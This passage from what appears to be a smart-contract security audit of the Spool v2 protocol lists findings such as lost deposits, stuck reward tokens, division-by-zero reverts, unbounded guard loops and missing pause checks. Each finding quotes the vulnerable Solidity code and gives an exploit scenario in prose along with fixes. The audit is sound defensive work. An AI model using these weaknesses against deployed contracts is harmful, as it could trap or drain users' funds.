Alice adds a reward token A to her smart vault S. After a month, she removes token A from her smart vault. After some time, she forgets that she removed token A from her vault. She calls extendRewardEmission with 1,000 token A as the reward. The amount of token A is transferred from Alice to the RewardManager contract, but it is not distributed to the users because it is not present in the list of reward tokens added for smart vault S. The 1,000 tokens are stuck in the RewardManager contract.

Recommendations
Short term, modify the associated code so that it deletes the rewardConfiguration[smartVault][token] configuration when removing a reward token for a smart vault.

Long term, add test cases to check for expected user interactions to catch bugs such as this.
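A sketch (ours) of the short-term fix, one added line in the function from figure 28.1; the same change also addresses TOB-SPL-29 below:

    // Sketch (not from the codebase): clear the reward configuration when the
    // token is removed, so tokenAdded and periodFinish are reset.
    function _removeReward(address smartVault, IERC20 token) private {
        uint256 _rewardTokensCount = rewardTokensCount[smartVault];
        for (uint256 i; i < _rewardTokensCount; ++i) {
            if (rewardTokens[smartVault][i] == token) {
                rewardTokens[smartVault][i] = rewardTokens[smartVault][_rewardTokensCount - 1];
                delete rewardTokens[smartVault][_rewardTokensCount - 1];
                rewardTokensCount[smartVault]--;

                delete rewardConfiguration[smartVault][token]; // added line

                emit RewardRemoved(smartVault, token);
                break;
            }
        }
    }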
29. A reward token cannot be added once it is removed from a smart vault

Severity: Low                         Difficulty: Low
Type: Data Validation                 Finding ID: TOB-SPL-29
Target: rewards/RewardManager.sol

Description
Smart vault owners cannot add reward tokens again after they have been removed once from the smart vault, making owners incapable of providing incentives to users.

The removeReward function in the RewardManager contract calls the _removeReward function, which does not remove the reward configuration:

    function _removeReward(address smartVault, IERC20 token) private {
        uint256 _rewardTokensCount = rewardTokensCount[smartVault];
        for (uint256 i; i < _rewardTokensCount; ++i) {
            if (rewardTokens[smartVault][i] == token) {
                rewardTokens[smartVault][i] = rewardTokens[smartVault][_rewardTokensCount - 1];
                delete rewardTokens[smartVault][_rewardTokensCount - 1];
                rewardTokensCount[smartVault]--;

                emit RewardRemoved(smartVault, token);
                break;
            }
        }
    }

Figure 29.1: The _removeReward function in spool-v2-core/RewardManager.sol

The addToken function checks whether the value of tokenAdded in the rewardConfiguration[smartVault][token] configuration is zero to make sure that the token was not already added to the smart vault:

    function addToken(address smartVault, IERC20 token, uint32 rewardsDuration, uint256 reward)
        external
        onlyAdminOrVaultAdmin(smartVault, msg.sender)
        exceptUnderlying(smartVault, token)
    {
        RewardConfiguration storage config = rewardConfiguration[smartVault][token];

        if (tokenBlacklist[smartVault][token]) revert RewardTokenBlacklisted(address(token));
        if (config.tokenAdded != 0) revert RewardTokenAlreadyAdded(address(token));
        if (rewardsDuration == 0) revert InvalidRewardDuration();
        if (rewardTokensCount[smartVault] > 5) revert RewardTokenCapReached();

        rewardTokens[smartVault][rewardTokensCount[smartVault]] = token;
        rewardTokensCount[smartVault]++;

        config.rewardsDuration = rewardsDuration;

        if (reward > 0) {
            _extendRewardEmission(smartVault, token, reward);
        }
    }

Figure 29.2: The addToken function in spool-v2-core/RewardManager.sol

After a reward token is removed from a smart vault, the value of tokenAdded in the rewardConfiguration[smartVault][token] configuration is left as nonzero, which prevents the smart vault owner from adding the token again for reward distribution as an incentive to the users of the smart vault.

Exploit Scenario
Alice adds a reward token A to her smart vault S. After a month, she removes token A from her smart vault. Noticing the success of her earlier reward incentive program, she wants to add reward token A to her smart vault again, but her transaction to add the reward token reverts, leaving her with no choice but to distribute another token.

Recommendations
Short term, modify the associated code so that it deletes the rewardConfiguration[smartVault][token] configuration when removing a reward token for a smart vault.

Long term, add test cases to check for expected user interactions to catch bugs such as this.

30. Missing whenNotPaused modifier

Severity: Low                         Difficulty: Low
Type: Undefined Behavior              Finding ID: TOB-SPL-30
Target: rewards/RewardPool.sol

Description
The documentation specifies which functionalities should not be working when the system is paused, including the claiming of rewards; however, the claim function does not have the whenNotPaused modifier. As a result, users can claim their rewards even when the system is paused.

    If the system is paused:
    - users can't claim vault incentives
    - [...]

Figure 30.1: A snippet of the provided Spool documentation

    function claim(ClaimRequest[] calldata data) public {

Figure 30.2: The claim function header in spool-v2-core/RewardPool.sol#L47

Exploit Scenario
Alice, who has the ROLE_PAUSER role in the system, pauses the protocol after she sees a possible vulnerability in the claim function.
The Spool team believes that no funds can move out of the system; however, users can still claim their rewards.

Recommendations
Short term, add the whenNotPaused modifier to the claim function.

Long term, improve the system's unit and integration tests by adding a test to verify that the expected functionalities do not work when the system is in a paused state.

31. Users who deposit and then withdraw before doHardWork lose their tokens

Severity: High                        Difficulty: Low
Type: Undefined Behavior              Finding ID: TOB-SPL-31
Target: managers/DepositManager.sol

Description
Users who deposit and then withdraw assets before doHardWork is called will receive zero tokens from their withdrawal operations.

When a user deposits assets, the depositAssets function mints an NFT with some metadata to the user, who can later redeem it for the underlying SVT tokens.

    function depositAssets(DepositBag calldata bag, DepositExtras calldata bag2)
        external
        onlyRole(ROLE_SMART_VAULT_MANAGER, msg.sender)
        returns (uint256[] memory, uint256)
    {
        [...]
        // mint deposit NFT
        DepositMetadata memory metadata = DepositMetadata(bag.assets, block.timestamp, bag2.flushIndex);
        uint256 depositId = ISmartVault(bag.smartVault).mintDepositNFT(bag.receiver, metadata);
        [...]
    }

Figure 31.1: A snippet of the depositAssets function in spool-v2-core/DepositManager.sol#L379–L439

Users call the claimSmartVaultTokens function in the SmartVaultManager contract to claim SVT tokens. It is important to note that this function calls the _syncSmartVault function with false as the last argument, which means that it will not revert if the current flush index and the flush index to sync are the same. Then, claimSmartVaultTokens delegates the work to the corresponding function in the DepositManager contract.

    function claimSmartVaultTokens(address smartVault, uint256[] calldata nftIds, uint256[] calldata nftAmounts)
        public
        whenNotPaused
        returns (uint256)
    {
        _onlyRegisteredSmartVault(smartVault);

        address[] memory tokens = _assetGroupRegistry.listAssetGroup(_smartVaultAssetGroups[smartVault]);
        _syncSmartVault(smartVault, _smartVaultStrategies[smartVault], tokens, false);

        return _depositManager.claimSmartVaultTokens(smartVault, nftIds, nftAmounts, tokens, msg.sender);
    }

Figure 31.2: A snippet of the claimSmartVaultTokens function in spool-v2-core/SmartVaultManager.sol#L238–L247

Later, the claimSmartVaultTokens function in DepositManager (figure 31.3) computes the SVT tokens that users will receive by calling the getClaimedVaultTokensPreview function and passing the bag.mintedSVTs value for the flush corresponding to the burned NFT.

    function claimSmartVaultTokens(
        address smartVault,
        uint256[] calldata nftIds,
        uint256[] calldata nftAmounts,
        address[] calldata tokens,
        address executor
    ) external returns (uint256) {
        _checkRole(ROLE_SMART_VAULT_MANAGER, msg.sender);
        [...]
        ClaimTokensLocalBag memory bag;
        ISmartVault vault = ISmartVault(smartVault);
        bag.metadata = vault.burnNFTs(executor, nftIds, nftAmounts);

        for (uint256 i; i < nftIds.length; ++i) {
            if (nftIds[i] > MAXIMAL_DEPOSIT_ID) {
                revert InvalidDepositNftId(nftIds[i]);
            }

            // we can pass empty strategy array and empty DHW index array,
            // because vault should already be synced and mintedVaultShares values available
            bag.data = abi.decode(bag.metadata[i], (DepositMetadata));
            bag.mintedSVTs = _flushShares[smartVault][bag.data.flushIndex].mintedVaultShares;

            claimedVaultTokens +=
                getClaimedVaultTokensPreview(smartVault, bag.data, nftAmounts[i], bag.mintedSVTs, tokens);
        }

Figure 31.3: A snippet of the claimSmartVaultTokens function in spool-v2-core/DepositManager.sol#L135–L184

Then, getClaimedVaultTokensPreview calculates the SVT tokens proportional to the amount deposited.

    function getClaimedVaultTokensPreview(
        address smartVaultAddress,
        DepositMetadata memory data,
        uint256 nftShares,
        uint256 mintedSVTs,
        address[] calldata tokens
    ) public view returns (uint256) {
        [...]
        for (uint256 i; i < data.assets.length; ++i) {
            depositedUsd += _priceFeedManager.assetToUsdCustomPrice(tokens[i], data.assets[i], exchangeRates[i]);
            totalDepositedUsd += _priceFeedManager.assetToUsdCustomPrice(tokens[i], totalDepositedAssets[i], exchangeRates[i]);
        }

        uint256 claimedVaultTokens = mintedSVTs * depositedUsd / totalDepositedUsd;

        return claimedVaultTokens * nftShares / NFT_MINTED_SHARES;
    }

Figure 31.4: A snippet of the getClaimedVaultTokensPreview function in spool-v2-core/DepositManager.sol#L546–L572

However, the value of _flushShares[smartVault][bag.data.flushIndex].mintedVaultShares, shown in figure 31.3, will always be 0: the value is updated in the syncDeposits function, but because the current flush cycle has not finished yet, syncDeposits cannot be called through syncSmartVault. The same problem appears in the redeem, redeemFast, and claimWithdrawal functions.

Exploit Scenario
Bob deposits assets into a smart vault, but he notices that he deposited into the wrong smart vault. He calls redeem and claimWithdrawal, expecting to receive his tokens back, but he receives zero tokens. The tokens are locked in the smart contracts.

Recommendations
Short term, do not allow users to withdraw tokens when the corresponding flush has not yet happened.

Long term, document and test the expected effects of calling functions in all of the possible orders, and add adequate constraints to avoid unexpected behavior.

32. Lack of events emitted for state-changing functions

Severity: Informational               Difficulty: Low
Type: Auditing and Logging            Finding ID: TOB-SPL-32
Target: src/

Description
Multiple critical operations do not emit events. As a result, it will be difficult to review the correct behavior of the contracts once they have been deployed.

Events generated during contract execution aid in monitoring, baselining of behavior, and detection of suspicious activity. Without events, users and blockchain-monitoring systems cannot easily detect behavior that falls outside the baseline conditions. This may prevent malfunctioning contracts or attacks from being detected.
The following operations should trigger events: ● SpoolAccessControl.grantSmartVaultOwnership ● ActionManager.setActions ● SmartVaultManager.registerSmartVault ● SmartVaultManager.removeStrategy ● SmartVaultManager.syncSmartVault ● SmartVaultManager.reallocate ● StrategyRegistry.registerStrategy ● StrategyRegistry.removeStrategy ● StrategyRegistry.doHardWork ● StrategyRegistry.setEcosystemFee ● StrategyRegistry.setEcosystemFeeReceiver ● StrategyRegistry.setTreasuryFee ● StrategyRegistry.setTreasuryFeeReceiver ● Strategy.doHardWork ● RewardManager.addToken ● RewardManager.extendRewardEmission Exploit Scenario The Spool system experiences a security incident, but the Spool team has trouble reconstructing the sequence of events causing the incident because of missing log information. Recommendations Short term, add events for all operations that may contribute to a higher level of monitoring and alerting. Long term, consider using a blockchain-monitoring system to track any suspicious behavior in the contracts. The system relies on several contracts to behave as expected. A monitoring mechanism for critical events would quickly detect any compromised system components. 33. Removal of a strategy could result in loss of funds Severity: Medium Difficulty: Medium Type: Undefined Behavior Finding ID: TOB-SPL-33 Target: managers/SmartVaultManager.sol Description A Spool admin can remove a strategy from the system, which will be replaced by a ghost strategy in all smart vaults that use it; however, if a strategy is removed when the system is in specific states, funds to be deposited or withdrawn in the next “do hard work” cycle will be lost. If the following sequence of events occurs, the asset deposited will be lost from the removed strategy: 1. A user deposits assets into a smart vault. 2. The flush function is called. The StrategyRegistry._assetsDeposited[strategy][xxx][yyy] storage variable now has assets to send to the given strategy in the next “do hard work” cycle. 3. The strategy is removed. 4. doHardWork is called, but the assets for the removed strategy are locked in the master wallet because the function can be called only for valid strategies. If the following sequence of events occurs, the assets withdrawn from a removed strategy will be lost: 1. doHardWork is called. 2. The strategy is removed before a smart vault sync is done. Exploit Scenario Multiple smart vaults use strategy A. Users deposited a total of $1 million, and $300,000 should go to strategy A. Strategy A is removed due to an issue in the third-party protocol. All of the $300,000 is locked in the master wallet. Recommendations Short term, modify the associated code to properly handle deposited and withdrawn funds when strategies are removed. Long term, improve the system’s unit and integration tests: consider all of the possible transaction sequences in the system’s state and test them to ensure their correct behavior. 34. ExponentialAllocationProvider reverts on strategies without risk scores Severity: Medium Difficulty: Medium Type: Data Validation Finding ID: TOB-SPL-34 Target: providers/ExponentialAllocationProvider.sol Description The ExponentialAllocationProvider.calculateAllocation function can revert due to division-by-zero error when a strategy’s risk score has not been set by the risk provider. The risk variable in calculateAllocation represents the risk score set by the risk provider for the given strategy, represented by the index i . Ghost strategies can be passed to the function. 
If a ghost strategy's risk score has not been set (which is likely, as there would be no reason to set one), the function will revert with a division-by-zero error.

function calculateAllocation(AllocationCalculationInput calldata data)
    external
    pure
    returns (uint256[] memory)
{
    if (data.apys.length != data.riskScores.length) {
        revert ApysOrRiskScoresLengthMismatch(data.apys.length, data.riskScores.length);
    }
    [...]
    for (uint8 i; i < data.apys.length; ++i) {
        [...]
        int256 risk = fromUint(data.riskScores[i]);
        results[i] = uint256(div(apy, risk));
        resultSum += results[i];
    }

Figure 34.1: A snippet of the calculateAllocation function in spool-v2-core/ExponentialAllocationProvider.sol#L309–L340

Exploit Scenario
A strategy is removed from a smart vault that uses the ExponentialAllocationProvider contract. Bob, who has the ROLE_ALLOCATOR role, calls reallocate; however, the call reverts, and the smart vault is impossible to reallocate.

Recommendations
Short term, modify the calculateAllocation function so that it properly handles strategies with uninitialized risk scores.
Long term, improve the unit and integration tests for the allocators. Refactor the codebase so that ghost strategies are not passed to the calculateAllocation function.

35. Removing a strategy makes the smart vault unusable
Severity: Medium Difficulty: High
Type: Data Validation Finding ID: TOB-SPL-35
Target: managers/DepositManager.sol

Description
Removing a strategy from a smart vault causes every subsequent deposit transaction to revert, making the smart vault unusable. The deposit function of the SmartVaultManager contract calls the depositAssets function on the DepositManager contract. The depositAssets function calls the checkDepositRatio function, which takes an argument called strategyRatios:

function depositAssets(DepositBag calldata bag, DepositExtras calldata bag2)
    external
    onlyRole(ROLE_SMART_VAULT_MANAGER, msg.sender)
    returns (uint256[] memory, uint256)
{
    ...
    // check if assets are in correct ratio
    checkDepositRatio(
        bag.assets,
        SpoolUtils.getExchangeRates(bag2.tokens, _priceFeedManager),
        bag2.allocations,
        SpoolUtils.getStrategyRatiosAtLastDhw(bag2.strategies, _strategyRegistry)
    );
    ...
    return (_vaultDeposits[bag.smartVault][bag2.flushIndex].toArray(bag2.tokens.length), depositId);
}

Figure 35.1: The depositAssets function in spool-v2-core/DepositManager.sol

The value of strategyRatios is fetched from the StrategyRegistry contract, which returns an empty array for ghost strategies.
This empty array is then used in a for loop in the calculateFlushFactors function:

function calculateFlushFactors(
    uint256[] memory exchangeRates,
    uint16a16 allocation,
    uint256[][] memory strategyRatios
) public pure returns (uint256[][] memory) {
    uint256[][] memory flushFactors = new uint256[][](strategyRatios.length);

    // loop over strategies
    for (uint256 i; i < strategyRatios.length; ++i) {
        flushFactors[i] = new uint256[](exchangeRates.length);

        uint256 normalization = 0;
        // loop over assets
        for (uint256 j = 0; j < exchangeRates.length; j++) {
            normalization += strategyRatios[i][j] * exchangeRates[j];
        }

        // loop over assets
        for (uint256 j = 0; j < exchangeRates.length; j++) {
            flushFactors[i][j] = allocation.get(i) * strategyRatios[i][j] * PRECISION_MULTIPLIER / normalization;
        }
    }

    return flushFactors;
}

Figure 35.2: The calculateFlushFactors function in spool-v2-core/DepositManager.sol

The statement calculating the value of normalization tries to access an index of the empty array and reverts with the Index out of bounds error, causing the deposit function to revert for every transaction thereafter.

Exploit Scenario
A Spool admin removes a strategy from a smart vault. Because of the presence of a ghost strategy, users' deposit transactions into the smart vault revert with the Index out of bounds error.

Recommendations
Short term, modify the calculateFlushFactors function so that it skips ghost strategies in the loop used to calculate the value of normalization.
Long term, review the entire codebase, check the effects of removing strategies from smart vaults, and ensure that all of the functionality works for smart vaults with one or more ghost strategies.

36. Issues with the management of access control roles in deployment script
Severity: Low Difficulty: Low
Type: Access Controls Finding ID: TOB-SPL-36
Target: script/DeploySpool.s.sol

Description
The deployment script does not properly manage or assign access control roles. As a result, the protocol will not work as expected, and the protocol's contracts cannot be upgraded. The deployment script has multiple issues regarding the assignment or transfer of access control roles. It fails to grant certain roles and to revoke temporary roles on deployment:

● Ownership of the ProxyAdmin contract is not transferred to an EOA, multisig wallet, or DAO after the system is deployed, making the smart contracts non-upgradeable.
● The DEFAULT_ADMIN_ROLE role is not transferred to an EOA, multisig wallet, or DAO after the system is deployed, leaving no way to manage roles after deployment.
● The ADMIN_ROLE_STRATEGY role is not assigned to the StrategyRegistry contract, which is required to grant the ROLE_STRATEGY role to a strategy contract. Because of this, new strategies cannot be registered.
● The ADMIN_ROLE_SMART_VAULT_ALLOW_REDEEM role is not assigned to the SmartVaultFactory contract, which is required to grant the ROLE_SMART_VAULT_ALLOW_REDEEM role to smartVault contracts.
● The ROLE_SMART_VAULT_MANAGER and ROLE_MASTER_WALLET_MANAGER roles are not assigned to the DepositManager and WithdrawalManager contracts, making them unable to move funds from the master wallet contract.

We also found that the ROLE_SMART_VAULT_ADMIN role is not assigned to the smart vault owner when a new smart vault is created. This means that smart vault owners will not be able to manage their smart vaults.
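A minimal sketch of the missing wiring, written in the style of a Foundry deployment script, is shown below. This is ours, not the audited script: the contract variable names, the deployer address, and the protocolMultisig address are hypothetical, while the role constants are those listed above.

// Sketch: post-deployment role wiring that the script currently omits.
proxyAdmin.transferOwnership(protocolMultisig);                                   // make contracts upgradeable by the multisig
accessControl.grantRole(ADMIN_ROLE_STRATEGY, address(strategyRegistry));          // allow strategy registration
accessControl.grantRole(ADMIN_ROLE_SMART_VAULT_ALLOW_REDEEM, address(smartVaultFactory));
accessControl.grantRole(ROLE_SMART_VAULT_MANAGER, address(depositManager));       // allow master wallet moves
accessControl.grantRole(ROLE_MASTER_WALLET_MANAGER, address(depositManager));
accessControl.grantRole(ROLE_SMART_VAULT_MANAGER, address(withdrawalManager));
accessControl.grantRole(ROLE_MASTER_WALLET_MANAGER, address(withdrawalManager));
accessControl.grantRole(DEFAULT_ADMIN_ROLE, protocolMultisig);                    // hand over role administration
accessControl.renounceRole(DEFAULT_ADMIN_ROLE, deployer);                         // revoke the deployer's temporary role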
Exploit Scenario
The Spool team deploys the smart contracts using the deployment script, but due to the issues described in this finding, the team is unable to perform role management and upgrades when required.

Recommendations
Short term, modify the deployment script so that it does the following on deployment:
● Transfers ownership of the ProxyAdmin contract to an EOA, multisig wallet, or DAO
● Transfers the DEFAULT_ADMIN_ROLE role to an EOA, multisig wallet, or DAO
● Grants the required roles to the smart contracts
● Allows the SmartVaultFactory contract to grant the ROLE_SMART_VAULT_ADMIN role to owners of newly created smart vaults
Long term, document all of the system's roles and interactions between components that require privileged roles. Make sure that all of the components are granted their required roles following the principle of least privilege to keep the protocol secure and functioning as expected.

37. Risk of DoS due to unbounded loops
Severity: Medium Difficulty: High
Type: Data Validation Finding ID: TOB-SPL-37
Target: managers/SmartVaultManager.sol

Description
Guards and actions are run in unbounded loops. A smart vault creator can add too many guards and actions, potentially trapping the deposit and withdrawal functionality due to a lack of gas. The runGuards function calls all of the configured guard contracts in a loop:

function runGuards(address smartVaultId, RequestContext calldata context) external view {
    if (guardPointer[smartVaultId][context.requestType] == address(0)) {
        return;
    }

    GuardDefinition[] memory guards = _readGuards(smartVaultId, context.requestType);

    for (uint256 i; i < guards.length; ++i) {
        GuardDefinition memory guard = guards[i];

        bytes memory encoded = _encodeFunctionCall(smartVaultId, guard, context);
        (bool success, bytes memory data) = guard.contractAddress.staticcall(encoded);
        _checkResult(success, data, guard.operator, guard.expectedValue, i);
    }
}

Figure 37.1: The runGuards function in spool-v2-core/GuardManager.sol

Multiple conditions can cause this loop to run out of gas:
● The vault creator adds too many guards.
● One of the guard contracts consumes a high amount of gas.
● A guard starts consuming a high amount of gas after a specific block or at a specific state.

If user transactions reach out-of-gas errors due to these conditions, smart vaults can become unusable, and funds can become stuck in the protocol. A similar issue affects the runActions function in the ActionManager contract.

Exploit Scenario
Eve creates a smart vault with an upgradeable guard contract. Later, when users have made large deposits, Eve upgrades the guard contract to consume all of the available gas to trap user deposits in the smart vault for as long as she wants.

Recommendations
Short term, model all of the system's variable-length loops, including the ones used by runGuards and runActions, to ensure that they cannot block contract execution within expected system parameters.
Long term, carefully audit operations that consume a large amount of gas, especially those in loops.

38. Unsafe casts throughout the codebase
Severity: Undetermined Difficulty: Undetermined
Type: Data Validation Finding ID: TOB-SPL-38
Target: src/

Description
The codebase contains unsafe casts that could cause mathematical errors if they are reachable in certain states. Examples of possible unsafe casts are shown in figures 38.1 and 38.2.
function flushSmartVault( address smartVault, uint256 flushIndex, address [] calldata strategies, uint16a16 allocation, address [] calldata tokens ) external returns (uint16a16) { [...] _flushShares[smartVault][flushIndex].flushSvtSupply = uint128(ISmartVault(smartVault).totalSupply()) ; return _strategyRegistry.addDeposits(strategies, distribution); } Figure 38.1: A possible unsafe cast in spool-v2-core/DepositManager.sol#L220 function syncDeposits( address smartVault, uint256 [3] calldata bag, // uint256 flushIndex, // uint256 lastDhwSyncedTimestamp, // uint256 oldTotalSVTs, address [] calldata strategies, uint16a16[2] calldata dhwIndexes, address [] calldata assetGroup, SmartVaultFees calldata fees ) external returns (DepositSyncResult memory ) { [...] if (syncResult.mintedSVTs > 0) { _flushShares[smartVault][bag[0]].mintedVaultShares = uint128 (syncResult.mintedSVTs) ; [...] } return syncResult; } Figure 38.2: A possible unsafe cast in spool-v2-core/DepositManager.sol#L243 Recommendations Short term, review the codebase to identify all of the casts that may be unsafe. Analyze whether these casts could be a problem in the current codebase and, if they are unsafe, make the necessary changes to make them safe. Long term, when implementing potentially unsafe casts, always include comments to explain why those casts are safe in the context of the codebase. +6. Incorrect handling of fromVaultsOnly in removeStrategy Severity: Low Difficulty: Medium Type: Data Validation Finding ID: TOB-SPL-6 Target: managers/SmartVaultManager.sol Description The removeStrategy function allows Spool admins to remove a strategy from the smart vaults using it. Admins are also able to remove the strategy from the StrategyRegistry contract, but only if the value of fromVaultsOnly is false ; however, the implementation enforces the opposite, as shown in figure 6.1. function removeStrategy( address strategy, bool fromVaultsOnly) external { _checkRole(ROLE_SPOOL_ADMIN, msg.sender ); _checkRole(ROLE_STRATEGY, strategy); ... if ( fromVaultsOnly ) { _strategyRegistry.removeStrategy(strategy); } } Figure 6.1: The removeStrategy function in spool-v2-core/SmartVaultManager.sol#L298–L317 Exploit Scenario Bob, a Spool admin, calls removeStrategy with fromVaultsOnly set to true , believing that this call will not remove the strategy from the StrategyRegistry contract. However, once the transaction is executed, he discovers that the strategy was indeed removed. Recommendations Short term, replace if (fromVaultsOnly) with if (!fromVaultsOnly) in the removeStrategy function to implement the expected behavior. Long term, improve the system’s unit and integration tests to catch issues such as this one. +7. Risk of LinearAllocationProvider and ExponentialAllocationProvider reverts due to division by zero Severity: Medium Difficulty: High Type: Data Validation Finding ID: TOB-SPL-7 Target: providers/LinearAllocationProvider.sol , providers/ExponentialAllocationProvider.sol Description The LinearAllocationProvider and ExponentialAllocationProvider contracts’ calculateAllocation function can revert due to a division-by-zero error: LinearAllocationProvider ’s function reverts when the sum of the strategies’ APY values is 0 , and ExponentialAllocationProvider ’s function reverts when a single strategy has an APY value of 0 . 
Figure 7.1 shows a snippet of the LinearAllocationProvider contract's calculateAllocation function; if the apySum variable, which is the sum of all the strategies' APY values, is 0, a division-by-zero error will occur.

uint8[] memory arrayRiskScores = data.riskScores;
for (uint8 i; i < data.apys.length; ++i) {
    apySum += (data.apys[i] > 0 ? uint256(data.apys[i]) : 0);
    riskSum += arrayRiskScores[i];
}
uint8 riskt = uint8(data.riskTolerance + 10); // from 0 to 20

for (uint8 i; i < data.apys.length; ++i) {
    uint256 apy = data.apys[i] > 0 ? uint256(data.apys[i]) : 0;
    apy = (apy * FULL_PERCENT) / apySum;

Figure 7.1: Part of the calculateAllocation function in spool-v2-core/LinearAllocationProvider.sol#L39–L49

Figure 7.2 shows that for the ExponentialAllocationProvider contract's calculateAllocation function, if the call to log_2 occurs with partApy set to 0, the function will revert because of log_2's require statement, shown in figure 7.3.

for (uint8 i; i < data.apys.length; ++i) {
    uint256 uintApy = (data.apys[i] > 0 ? uint256(data.apys[i]) : 0);
    int256 partRiskTolerance = fromUint(uint256(riskArray[uint8(20 - riskt)]));
    partRiskTolerance = div(partRiskTolerance, _100);
    int256 partApy = fromUint(uintApy);
    partApy = div(partApy, _100);

    int256 apy = exp_2(mul(partRiskTolerance, log_2(partApy)));

Figure 7.2: Part of the calculateAllocation function in spool-v2-core/ExponentialAllocationProvider.sol#L323–L331

function log_2(int256 x) internal pure returns (int256) {
    unchecked {
        require(x > 0);

Figure 7.3: Part of the log_2 function in spool-v2-core/ExponentialAllocationProvider.sol#L32–L34

Exploit Scenario
Bob deploys a smart vault with two strategies using the ExponentialAllocationProvider contract. At some point, one of the strategies has 0 APY, causing the transaction call to reallocate the assets to unexpectedly revert.

Recommendations
Short term, modify both versions of the calculateAllocation function so that they correctly handle cases in which a strategy's APY is 0.
Long term, improve the system's unit and integration tests to ensure that the basic operations work as expected.

+8. Strategy APYs are never updated
Severity: Medium Difficulty: Low
Type: Undefined Behavior Finding ID: TOB-SPL-8
Target: managers/StrategyRegistry.sol

Description
The _updateDhwYieldAndApy function is never called. As a result, each strategy's APY will constantly be set to 0.

function _updateDhwYieldAndApy(address strategy, uint256 dhwIndex, int256 yieldPercentage) internal {
    if (dhwIndex > 1) {
        unchecked {
            int256 timeDelta = int256(block.timestamp - _stateAtDhw[address(strategy)][dhwIndex - 1].timestamp);

            if (timeDelta > 0) {
                int256 normalizedApy = yieldPercentage * SECONDS_IN_YEAR_INT / timeDelta;
                int256 weight = _getRunningAverageApyWeight(timeDelta);
                _apys[strategy] = (_apys[strategy] * (FULL_PERCENT_INT - weight) + normalizedApy * weight) / FULL_PERCENT_INT;
            }
        }
    }
}

Figure 8.1: The _updateDhwYieldAndApy function in spool-v2-core/StrategyManager.sol#L298–L317

A strategy's APY is one of the parameters used by an allocation provider to decide how to allocate a smart vault's assets. If a strategy's APY is 0, the LinearAllocationProvider and ExponentialAllocationProvider contracts will both revert when calculateAllocation is called due to a division-by-zero error.
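One possible remediation is sketched below. This is ours, not the audited code; it assumes that the bookkeeping step of StrategyRegistry.doHardWork is the intended call site and that dhwInfo.yieldPercentage carries the yield reported by the strategy for the current cycle.

// Sketch: invoke the currently unused updater during DHW bookkeeping so
// that _apys[strategy] tracks a running average instead of staying at 0.
_updateDhwYieldAndApy(strategy, dhwIndex, dhwInfo.yieldPercentage);
_dhwAssetRatios[strategy] = IStrategy(strategy).assetRatio();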
// set allocation
if (uint16a16.unwrap(allocations) == 0) {
    _riskManager.setRiskProvider(smartVaultAddress, specification.riskProvider);
    _riskManager.setRiskTolerance(smartVaultAddress, specification.riskTolerance);
    _riskManager.setAllocationProvider(smartVaultAddress, specification.allocationProvider);

    allocations = _riskManager.calculateAllocation(smartVaultAddress, specification.strategies);
}

Figure 8.2: Part of the _integrateSmartVault function, which is called when a vault is created, in spool-v2-core/SmartVaultFactory.sol#L313–L320

When a vault is created, the code in figure 8.2 is executed. For vaults whose strategyAllocation variable is set to 0, which means the value will be calculated by the smart contract, and whose allocationProvider variable is set to the LinearAllocationProvider or ExponentialAllocationProvider contract, the creation transaction will revert due to a division-by-zero error. Transactions for creating vaults with a nonzero strategyAllocation and with the same allocationProvider values mentioned above will succeed; however, the fund reallocation operation will revert because the _updateDhwYieldAndApy function is never called, causing the strategies' APYs to be set to 0, in turn causing the same division-by-zero error. Refer to finding TOB-SPL-7, which is related to this issue; even if that finding is fixed, incorrect results would still occur because of the missing _updateDhwYieldAndApy calls.

Exploit Scenario
Bob tries to deploy a smart vault with strategyAllocation set to 0 and allocationProvider set to LinearAllocationProvider. The transaction unexpectedly fails.

Recommendations
Short term, add calls to _updateDhwYieldAndApy where appropriate.
Long term, improve the system's unit and integration tests to ensure that the basic operations work as expected.

+9. Incorrect bookkeeping of assets deposited into smart vaults
Severity: High Difficulty: Low
Type: Undefined Behavior Finding ID: TOB-SPL-9
Target: managers/DepositManager.sol

Description
Assets deposited by users into smart vaults are incorrectly tracked. As a result, the assets deposited into a smart vault's strategies when the flushSmartVault function is invoked correspond to the last deposit instead of the sum of all deposits into the strategies. When depositing assets into a smart vault, users can decide whether to invoke the flushSmartVault function. A smart vault flush is a synchronization process that makes deposited funds available to be deployed into the strategies and makes withdrawn funds available to be withdrawn from the strategies. However, the internal bookkeeping of deposits keeps track of only the last deposit of the current flush cycle instead of the sum of all deposits (figure 9.1).

function depositAssets(DepositBag calldata bag, DepositExtras calldata bag2)
    external
    onlyRole(ROLE_SMART_VAULT_MANAGER, msg.sender)
    returns (uint256[] memory, uint256)
{
    ...
    // transfer tokens from user to master wallet
    for (uint256 i; i < bag2.tokens.length; ++i) {
        _vaultDeposits[bag.smartVault][bag2.flushIndex][i] = bag.assets[i];
    }
    ...

Figure 9.1: A snippet of the depositAssets function in spool-v2-core/DepositManager.sol#L379–L439

The _vaultDeposits variable is then used to calculate the asset distribution in the flushSmartVault function, shown in figure 9.2; a one-line sketch of a possible fix follows.
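A minimal sketch of the accumulation fix (ours, not the audited code):

// Sketch: accumulate every deposit made during the current flush cycle
// instead of overwriting the previously recorded amount.
_vaultDeposits[bag.smartVault][bag2.flushIndex][i] += bag.assets[i];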
function flushSmartVault(
    address smartVault,
    uint256 flushIndex,
    address[] calldata strategies,
    uint16a16 allocation,
    address[] calldata tokens
) external returns (uint16a16) {
    _checkRole(ROLE_SMART_VAULT_MANAGER, msg.sender);

    if (_vaultDeposits[smartVault][flushIndex][0] == 0) {
        return uint16a16.wrap(0);
    }

    // handle deposits
    uint256[] memory exchangeRates = SpoolUtils.getExchangeRates(tokens, _priceFeedManager);
    _flushExchangeRates[smartVault][flushIndex].setValues(exchangeRates);

    uint256[][] memory distribution = distributeDeposit(
        DepositQueryBag1({
            deposit: _vaultDeposits[smartVault][flushIndex].toArray(tokens.length),
            exchangeRates: exchangeRates,
            allocation: allocation,
            strategyRatios: SpoolUtils.getStrategyRatiosAtLastDhw(strategies, _strategyRegistry)
        })
    );
    ...
    return _strategyRegistry.addDeposits(strategies, distribution);
}

Figure 9.2: A snippet of the flushSmartVault function in spool-v2-core/DepositManager.sol#L188–L226

Lastly, the _strategyRegistry.addDeposits function is called with the computed distribution; it adds the amounts to deploy in the next doHardWork call to the _assetsDeposited variable (figure 9.3).

function addDeposits(address[] calldata strategies_, uint256[][] calldata amounts)
    external
    onlyRole(ROLE_SMART_VAULT_MANAGER, msg.sender)
    returns (uint16a16)
{
    uint16a16 indexes;
    for (uint256 i; i < strategies_.length; ++i) {
        address strategy = strategies_[i];

